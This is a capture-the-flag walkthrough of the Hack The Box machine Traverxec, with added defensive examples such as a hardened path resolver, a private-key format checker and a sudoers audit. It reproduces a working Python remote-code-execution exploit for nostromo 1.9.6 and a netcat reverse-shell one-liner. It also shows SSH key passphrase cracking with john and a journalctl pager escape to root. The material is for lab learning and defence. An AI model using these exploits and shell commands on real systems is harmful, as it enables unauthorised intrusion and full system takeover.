Hack the Box: Traverxec
Everything is a copy of a copy of a copy.
- Chuck Palahniuk, Fight Club
We are going to pwn Traverxec by jkr from Hack The Box. Getting a user shell is fun, and by using GTFOBins correctly we can get root easily.
Enumeration
We start with our basic portscan of the box.
kali@kali:~$ nmap -sC -sV -oA SecNotes -vv --script vuln 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 03:38 EDT
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:38
Completed NSE at 03:38, 10.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:38
Completed NSE at 03:38, 0.00s elapsed
Initiating Ping Scan at 03:38
Scanning 10.10.10.165 [2 ports]
Completed Ping Scan at 03:38, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:38
Completed Parallel DNS resolution of 1 host. at 03:38, 0.08s elapsed
Initiating Connect Scan at 03:38
Scanning 10.10.10.165 [1000 ports]
Discovered open port 80/tcp on 10.10.10.165
Discovered open port 22/tcp on 10.10.10.165
Completed Connect Scan at 03:38, 17.83s elapsed (1000 total ports)
Initiating Service scan at 03:38
Scanning 2 services on 10.10.10.165
Completed Service scan at 03:39, 6.87s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.165.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:39
NSE: [firewall-bypass 10.10.10.165] lacks privileges.
NSE Timing: About 98.89% done; ETC: 03:39 (0:00:00 remaining)
NSE Timing: About 99.26% done; ETC: 03:40 (0:00:00 remaining)
NSE Timing: About 99.26% done; ETC: 03:40 (0:00:01 remaining)
NSE Timing: About 99.26% done; ETC: 03:41 (0:00:01 remaining)
NSE Timing: About 99.63% done; ETC: 03:41 (0:00:01 remaining)
Completed NSE at 03:41, 154.76s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:41
NSE: [tls-ticketbleed 10.10.10.165:80] Not running due to lack of privileges.
Completed NSE at 03:41, 2.05s elapsed
Nmap scan report for 10.10.10.165
Host is up, received syn-ack (0.24s latency).
Scanned at 2020-04-10 03:38:37 EDT for 182s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http syn-ack nostromo 1.9.6
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.165
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.165:80/
| Form id: contact-name
|_ Form action: empty.html
|_http-dombased-xss: Couldn’t find any DOM based XSS.
|_http-jsonp-detection: Couldn’t find any JSONP endpoints.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server’s resources causing Denial Of Service.
|
| Disclosure date: 2009–09–17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011–08–19
| References:
| https://www.tenable.com/plugins/nessus/55976
| https://www.securityfocus.com/bid/49303
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn’t find wp-login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:41
Completed NSE at 03:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:41
Completed NSE at 03:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.64 seconds
Beyond the two open ports, the interesting finding is the web server banner: nostromo 1.9.6. The "vulnerable" verdicts from --script vuln are generic DoS checks (Slowloris), and the Apache byte-range result is reported against a server that is not Apache, so they are noise for our purposes.
Searching for exploits against nostromo 1.9.6 turns up a remote code execution exploit for CVE-2019-16278 (exploit-db 47837):
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278
#!/usr/bin/env python
# Works under Python 2.7 and Python 3 (bytes/str handled explicitly).
import sys
import socket

# The original file carries a large ASCII-art banner here; it did not
# survive extraction and is replaced by a one-line banner.
art = "CVE-2019-16278 - nostromo 1.9.6 remote code execution"

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'


def connect(soc):
    """Read until the server closes the connection and return the raw output."""
    response = b""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection
    except socket.error:
        pass
    return response


def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    # "/.%0d./" gets past nostromo's "../" check and is normalised to "../"
    # only after that check, so the request path resolves to /bin/sh outside
    # the document root. The request body is fed to the spawned shell's stdin.
    payload = ('POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n'
               'Content-Length: 1\r\n\r\n'
               'echo\necho\n{} 2>&1').format(cmd)
    soc.send(payload.encode())
    receive = connect(soc)
    print(receive.decode(errors="replace"))


if __name__ == "__main__":
    print(art)
    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]
        cve(target, port, cmd)
    except IndexError:
        print(help_menu)
The script ships with Kali's exploitdb package; copy it into the working directory and run it without arguments to see the usage:
cp /usr/share/exploitdb/exploits/multiple/remote/47837.py /root/machines/traverxec
python 47837.py
The script takes three positional parameters:
- target IP address (10.10.10.165)
- target port (80)
- command to execute (e.g. whoami)
python 47837.py 10.10.10.165 80 whoami
The command output comes back in the HTTP response, so we have unauthenticated command execution on the remote server as the web server user. Let's turn this into a reverse shell to have a more comfortable way of running commands on the box.
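Before moving on to the shell, it is worth seeing why that odd-looking request path is accepted at all. The reported root cause of CVE-2019-16278 is an ordering bug in nostromo's path verification: the check for "../" runs on the decoded URI before stray carriage-return bytes (%0d) are stripped, so "/.%0d./" slips past the check and is normalised to "/../" afterwards. The following is an added example written for this page, not nostromo's code or the exploit author's: a simplified Python model of the vulnerable ordering next to a hardened resolver that rejects control characters and checks containment after normalisation. DOCROOT follows the /var/nostromo/htdocs path that shows up later in the writeup; everything else here is a modelling assumption.

```python
import posixpath
from urllib.parse import unquote

# Document root as seen later in server-stats.sh on the box.
DOCROOT = "/var/nostromo/htdocs"
# The request path used by exploit-db 47837.
EXPLOIT_URI = "/.%0d./.%0d./.%0d./.%0d./bin/sh"


def vulnerable_resolve(docroot, raw_uri):
    """Simplified model of nostromo 1.9.6 (CVE-2019-16278), not its C code:
    the traversal check looks at the decoded URI, and carriage returns are
    removed only afterwards, so '/.\\r./' is not caught but becomes '/../'."""
    decoded = unquote(raw_uri)
    if "/../" in decoded or decoded.endswith("/.."):
        return None                       # the check catches only the plain form
    cleaned = decoded.replace("\r", "")   # CR stripping happens after the check
    return posixpath.normpath(docroot + cleaned)


def hardened_resolve(docroot, raw_uri):
    """Decode, refuse control bytes, normalise, then enforce containment."""
    decoded = unquote(raw_uri)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return None                       # CR, LF, NUL and friends never belong in a path
    root = posixpath.normpath(docroot)
    target = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Compare against root + "/" so a sibling such as /var/nostromo/htdocs2 is not accepted.
    if target != root and not target.startswith(root + "/"):
        return None
    return target


if __name__ == "__main__":
    for uri in (EXPLOIT_URI, "/../../../../bin/sh", "/index.html"):
        print("%-34s vulnerable=%-35s hardened=%s" % (
            uri, vulnerable_resolve(DOCROOT, uri), hardened_resolve(DOCROOT, uri)))
```

The lesson generalises beyond nostromo: any filter that runs before the last transformation of its input (decoding, stripping, case folding) can be bypassed by encoding the forbidden pattern so that the transformation produces it. Canonicalise first, then check, and check the final path against the root rather than looking for substrings.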
We are going to use netcat to do this…
python 47837.py 10.10.10.165 80 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 9001 >/tmp/f"
With a listener waiting on our side (nc -lvnp 9001 on 10.10.14.140), we get a reverse shell on the remote server as www-data. From here we can enumerate the web server's installation under /var/nostromo:
www-data@traverxec:/var/nostromo/conf$ ls -la
ls -la
total 20
drwxr-xr-x 2 root daemon 4096 Oct 27 16:12 .
drwxr-xr-x 6 root root 4096 Oct 25 14:43 ..
-rw-r--r-- 1 root bin 41 Oct 25 15:20 .htpasswd
-rw-r--r-- 1 root bin 2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin 498 Oct 25 15:20 nhttpd.conf
The conf directory is the place to look for information that could help us move to a user account.
Reading nhttpd.conf gives us two useful facts: david, who is also a local user on the machine, is configured as the server admin, and nostromo is configured to serve users' public_www directories from their home directories under /home.
There is no public_www directly under /home, though.
Since david is the server admin, his home directory is the natural place for a public_www. We cannot list /home/david itself as www-data, but listing a directory needs read permission on it while entering it only needs execute, so we can still access a subdirectory whose name we already know:
www-data@traverxec:/var/nostromo/conf$ ls /home/david/public_www
index.html protected-file-area
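Why did this work when `ls /home/david` fails? The later listing of ~/bin shows david's home directory as drwx--x--x: other users get execute but not read. On a directory, read is what `ls` needs to enumerate names, while execute only lets you pass through to an entry you can name yourself. So www-data cannot see what is in /home/david but can open /home/david/public_www because the name came from nhttpd.conf. Below is an added demonstration for this page, not from the writeup: it builds a throwaway copy of that layout, drops the read bit on the fake home, and shows that listing it fails while reaching a known subdirectory beneath it succeeds. Because we run as the directory's owner, the demo strips the owner's read bit too (--x--x--x) to reproduce www-data's view with a single account; root ignores mode bits entirely, which the result records.

```python
import os
import shutil
import stat
import tempfile


def build_demo_home():
    """Constructed stand-in for /home/david: traverse-only home directory with a
    readable public_www tree below it. Returns the fake home's path."""
    root = tempfile.mkdtemp(prefix="traverxec-perm-demo-")
    home = os.path.join(root, "david")
    protected = os.path.join(home, "public_www", "protected-file-area")
    os.makedirs(protected)
    with open(os.path.join(protected, "backup-ssh-identity-files.tgz"), "wb") as fh:
        fh.write(b"constructed placeholder, not a real archive\n")
    # On the box the home is drwx--x--x, so www-data (class "other") gets x only.
    # We are the owner here, so drop the owner's r bit as well: --x--x--x.
    os.chmod(home, stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return home


def can_list(path):
    """What `ls <dir>` needs: read permission on the directory itself."""
    try:
        os.listdir(path)
        return True
    except PermissionError:
        return False


def can_reach(path):
    """What `ls <dir>/known-name` needs: execute on every directory on the way."""
    try:
        os.stat(path)
        return True
    except PermissionError:
        return False


def cleanup(home):
    os.chmod(home, stat.S_IRWXU)          # give ourselves read back so rmtree can work
    shutil.rmtree(os.path.dirname(home))


def run_demo():
    """Build the tree, probe it the way www-data would, and tear it down."""
    home = build_demo_home()
    try:
        public_www = os.path.join(home, "public_www")
        return {
            "list_home": can_list(home),                # False unless running as root
            "reach_public_www": can_reach(public_www),  # True: x on home suffices
            "list_public_www": can_list(public_www),    # True: public_www itself is readable
            "root": os.geteuid() == 0,                  # root bypasses mode bits
        }
    finally:
        cleanup(home)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-18s %s" % (key, value))
```

The same logic is why the nostromo homedirs feature is a guessing game for an attacker only until a configuration file gives away a directory name.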
index.html sits next to a directory whose name promises protected files. Let's see what's in there:
www-data@traverxec:/var/nostromo/conf$ ls /home/david/public_www/protected-file-area
backup-ssh-identity-files.tgz
Let's move to /tmp and extract the archive there:
www-data@traverxec:/tmp$ tar zvxf /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
The Proc-Type and DEK-Info headers tell us this is a passphrase-protected private key in the legacy PEM format, encrypted with AES-128-CBC:
www-data@traverxec:/tmp/home/david/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
[...]
-----END RSA PRIVATE KEY-----
Let’s copy it on our machine and try to crack it with John:
$ ssh2john.py id_rsa > id_rsa.hash
$ john --wordlist=lists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2019-11-21 18:03) 0.4329g/s 6208Kp/s 6208Kc/s 6208KC/s *7¡Vamos!
Session completed
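John's cost lines explain the two-second crack. The key is in the legacy PEM format (the Proc-Type/DEK-Info headers), where OpenSSL derives the AES key from the passphrase with a single MD5 round, using the first eight bytes of the IV as salt, so every guess costs one hash and rockyou flies by at millions of candidates per second. A key written in the newer openssh-key-v1 format (ssh-keygen -o, the default since OpenSSH 7.8) uses bcrypt_pbkdf with a configurable number of rounds and is far more expensive to guess. The example below is added for this page and is not from the writeup or from john: it reads only the headers of a private key and reports which scheme protects it. The legacy sample reuses the header lines from david's id_rsa above with a constructed placeholder body; the openssh-key-v1 sample is built in code and truncated after the KDF options, which is all the inspector reads.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"

# Header lines as they appear in the writeup's id_rsa; the body is a constructed
# placeholder, not david's key material.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(pem):
    """Return format, cipher and KDF details for a PEM-wrapped private key."""
    lines = [l.strip() for l in pem.strip().splitlines()]
    if "OPENSSH PRIVATE KEY" in lines[0]:
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":                       # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: RFC 1421 style headers follow the BEGIN line up to a blank line.
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip()] = v.strip()
    if headers.get("Proc-Type") != "4,ENCRYPTED":
        return {"format": "legacy-pem", "encrypted": False,
                "cipher": None, "kdf": None, "rounds": None}
    cipher, iv_hex = headers["DEK-Info"].split(",")
    return {"format": "legacy-pem", "encrypted": True, "cipher": cipher,
            "kdf": "EVP_BytesToKey-MD5", "rounds": 1,
            "salt_hex": iv_hex[:16]}               # OpenSSL salts with the first 8 IV bytes


def rate(info):
    """One-line verdict a key audit would print."""
    if not info["encrypted"]:
        return "unencrypted: whoever reads the file owns the key"
    if info["format"] == "legacy-pem":
        return "weak: one MD5 round per guess, offline cracking runs at millions of guesses per second"
    if info["kdf"] == "bcrypt":
        return "strong: bcrypt_pbkdf with %d rounds" % info["rounds"]
    return "unknown kdf %s" % info["kdf"]


def build_openssh_v1_sample(rounds=16, cipher=b"aes256-ctr"):
    """Constructed openssh-key-v1 header (what `ssh-keygen -o` writes), cut off
    after the KDF options because the inspector reads nothing beyond them."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    kdfopts = s(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = OPENSSH_MAGIC + s(cipher) + s(b"bcrypt") + s(kdfopts) + struct.pack(">I", 1)
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % body


if __name__ == "__main__":
    for sample in (LEGACY_SAMPLE, build_openssh_v1_sample()):
        info = inspect_private_key(sample)
        print(info, "->", rate(info))
```

Run over a fleet's authorized keys backups or a developer's ~/.ssh, this is a quick way to find keys that a leaked tarball like this one would turn into a user account in seconds.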
Escalation to user
Let's use the key with the recovered passphrase (hunter) to get a shell as david:
$ ssh david@10.10.10.165 -i id_rsa
The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established.
ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.165' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$
And we got user!
Escalation to root
Now, I have to confess that I went around in circles for many hours before finding anything, and I had to resort to a forum for help. In david's home directory there is a directory named "bin". Inside is a shell script with an interesting last line.
david@traverxec:~/bin$ ls -la
total 24
drwx------ 2 david david 4096 Mar 8 09:33 .
drwx--x--x 6 david david 4096 Mar 8 09:42 ..
-rw------- 1 david david 1460 Mar 8 09:33 nano.save
-rw------- 1 david david 1460 Mar 8 09:33 nano.save.1
-r-------- 1 david david 802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
The last line runs through sudo, so it executes as root. Launching it exactly as written works without a password, but as soon as I change any argument the system asks me for david's password (yes, I tried the passphrase found before, but it does not work here). So the sudoers rule lets david run precisely /usr/bin/journalctl -n5 -unostromo.service as root without a password, and nothing else.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:29:23 EDT. --
Mar 08 10:26:47 traverxec sudo[1781]: www-data : command not allowed ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=list
Mar 08 10:26:58 traverxec sudo[1788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/
Mar 08 10:27:08 traverxec sudo[1788]: www-data : command not allowed ; TTY=pts/5 ; PWD=/tmp ; USER=root ; COMMAND=list
Mar 08 10:27:15 traverxec su[1793]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/5 ruser=w
Mar 08 10:27:17 traverxec su[1793]: FAILED SU (to root) www-data on pts/5
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n6 -unostromo.service
[sudo] password for david:
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl
[sudo] password for david:
david@traverxec:~/bin$
The tip I picked up in the forum was GTFOBins, which I did not know: a curated list of Unix binaries that can be abused to bypass local security restrictions, with sections for sudo, SUID, capabilities and so on. Looking for something I could use for privilege escalation, I found journalctl in the sudo section.
https://gtfobins.github.io/gtfobins/journalctl/
The trick: when stdout is a terminal, journalctl hands its output to a pager (less), and less runs a shell command on "!", so "!/bin/sh" gives a shell with journalctl's root privileges. server-stats.sh avoids the pager by piping into /usr/bin/cat, but nothing stops us from running the permitted sudo command on its own. One caveat: systemd starts less with options that make it quit as soon as everything fits on one screen, so shrink the terminal to fewer lines than the header plus five log lines before running the command, then type !/bin/sh at the less prompt.
Ok, I think this should be done; last steps and the second flag will be mine.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:36:07 EDT. --
Mar 08 10:30:37 traverxec su[1843]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/6 ruser=w
Mar 08 10:30:39 traverxec su[1843]: FAILED SU (to david) www-data on pts/6
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): conversation failed
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Mar 08 10:35:17 traverxec sudo[2080]: www-data : user NOT in sudoers ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=/usr/bin
!/bin/sh
# ls -l
total 16
-rw------- 1 david david 1460 Mar 8 09:33 nano.save
-rw------- 1 david david 1460 Mar 8 09:33 nano.save.1
-r-------- 1 david david 802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
# ls -la /root
total 68
drwx------ 3 root root 4096 Mar 8 09:46 .
drwxr-xr-x 18 root root 4096 Oct 25 14:17 ..
lrwxrwxrwx 1 root root 9 Oct 25 16:21 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw------- 1 root root 47 Mar 8 09:46 .lesshst
drwxr-xr-x 3 root root 4096 Nov 12 04:00 .local
-rw-r--r-- 1 root root 37520 Oct 25 14:43 nostromo_1.9.6-1.deb
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Oct 25 16:21 root.txt
# cat /root/root.txt
9********************6
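From the defender's side, the rule that made this possible is a sudoers entry pinning david to one exact journalctl command line. Argument pinning is why -n6 asked for a password, but it says nothing about what the permitted program does with its output, and journalctl's pager is a documented shell escape. Two fixes keep the stats script working: add --no-pager to the permitted command line, or tag the rule NOEXEC so journalctl cannot exec less or anything else (NOEXEC relies on LD_PRELOAD, so it only covers dynamically linked programs). The Python below is an added example for this page, not from the writeup or from sudo: a small sudoers audit that parses rule lines and flags commands GTFOBins lists as pager or editor based shell escapes when neither mitigation is present. The sudoers text is constructed; its first rule is the one inferred from david's sudo behaviour, the others are variations to show what passes.

```python
import re
import shlex

# Commands GTFOBins documents as spawning a shell from a pager or editor when
# run under sudo. journalctl is the one that mattered on Traverxec.
PAGER_SPAWNERS = {"journalctl", "systemctl", "less", "more", "man",
                  "git", "vi", "vim", "nano"}
# Tools whose pager can be switched off on the command line.
NO_PAGER_FLAG = {"journalctl": "--no-pager", "systemctl": "--no-pager",
                 "git": "--no-pager"}

# user  hosts = (runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$")

# Constructed excerpt. The first david line is the rule inferred from the
# writeup (exact arguments, NOPASSWD); the rest are variations for comparison.
SAMPLE_SUDOERS = """
# /etc/sudoers (constructed for this example)
Defaults env_reset
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
david ALL=(root) NOPASSWD: NOEXEC: /usr/bin/journalctl -n5 -unostromo.service
ops   ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service --no-pager
ops   ALL=(root) /usr/bin/uptime
"""


def parse_sudoers(text):
    """Yield one dict per (user, command) from user specification lines.
    Defaults, comments and blank lines are skipped; aliases are not expanded."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append({"user": m.group("user"),
                          "runas": m.group("runas") or "root",
                          "tags": tags, "command": cmd.strip()})
    return rules


def audit_sudoers(text):
    """Flag rules whose permitted command can drop into a shell via its pager
    and that carry neither NOEXEC nor the tool's no-pager switch."""
    findings = []
    for rule in parse_sudoers(text):
        cmd = rule["command"]
        if cmd == "ALL":
            findings.append(dict(rule, issue="unrestricted command"))
            continue
        argv = shlex.split(cmd)
        binary = argv[0].rsplit("/", 1)[-1]
        if binary not in PAGER_SPAWNERS or "NOEXEC" in rule["tags"]:
            continue
        flag = NO_PAGER_FLAG.get(binary)
        if flag and flag in argv[1:]:
            continue
        fix = "tag the rule NOEXEC" + (" or add %s" % flag if flag else "")
        findings.append(dict(rule, issue="%s can hand its output to a pager with a shell escape; %s" % (binary, fix)))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("%s -> %s: %s" % (f["user"], f["command"], f["issue"]))
```

The audit is deliberately narrow (it does not expand User_Alias or Cmnd_Alias and splits commands on commas), but it catches the exact pattern here: a carefully argument-pinned rule whose program still offers a way out.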
I hope you got something out of my approach. If you have any issues or questions, please let me know in the comments section. Thanks for reading this walkthrough.